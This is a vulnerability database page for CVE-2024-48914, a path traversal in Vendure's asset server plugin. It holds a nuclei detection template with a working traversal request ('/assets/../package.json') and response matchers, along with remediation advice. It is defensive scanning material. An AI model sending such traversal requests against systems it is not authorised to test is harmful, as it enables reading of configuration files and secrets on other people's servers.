Lucene search
K

Vendure - Arbitrary File Read

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 62 Views

Vendure - Arbitrary File Read allows attackers to read arbitrary files, access sensitive data, and crash the server via a malformed URI. Patches available in versions 3.0.5 and 2.3.3. Workarounds include using object storage or defining middleware

Related
Refs
Code
id: CVE-2024-48914

info:
  name: Vendure - Arbitrary File Read
  author: s4e-io
  severity: critical
  description: |
    Vendure is an open-source headless commerce platform. Prior to versions 3.0.5 and 2.3.3, a vulnerability in Vendure's asset server plugin allows an attacker to craft a request which is able to traverse the server file system and retrieve the contents of arbitrary files, including sensitive data such as configuration files, environment variables, and other critical data stored on the server. In the same code path is an additional vector for crashing the server via a malformed URI.
  impact: |
    Allows attackers to read arbitrary files on the server, including sensitive data such as configuration files and environment variables.
  remediation: |
    Patches are available in versions 3.0.5 and 2.3.3. Some workarounds are also available. One may use object storage rather than the local file system, e.g. MinIO or S3, or define middleware which detects and blocks requests with urls containing `/../`.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-48914
    - https://github.com/EQSTLab/CVE-2024-48914
    - https://github.com/vendure-ecommerce/vendure
    - https://github.com/vendure-ecommerce/vendure/blob/801980e8f599c28c5059657a9d85dd03e3827992/packages/asset-server-plugin/src/plugin.ts#L352-L358
    - https://github.com/vendure-ecommerce/vendure/commit/e2ee0c43159b3d13b51b78654481094fdd4850c5
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2024-48914
    cwe-id: CWE-20
    epss-score: 0.59798
    epss-percentile: 0.99016
  metadata:
    verified: true
    max-request: 1
    vendor: vendure-ecommerce
    product: vendure
    fofa-query: "Vendure"
  tags: cve,cve2024,vendure,lfi,file-read,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/assets/../package.json"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "name", "version", "main" ,"license")'
          - 'contains(content_type, "application/octet-stream")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402207a2fb165df9fade4da20f6c90e968f3e555253fecaba09aef7255f345c058a0f022042ea8a7bd4e0899148335775114c018b82b620450bc39b8c9cfbd4ecd9e7c778:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation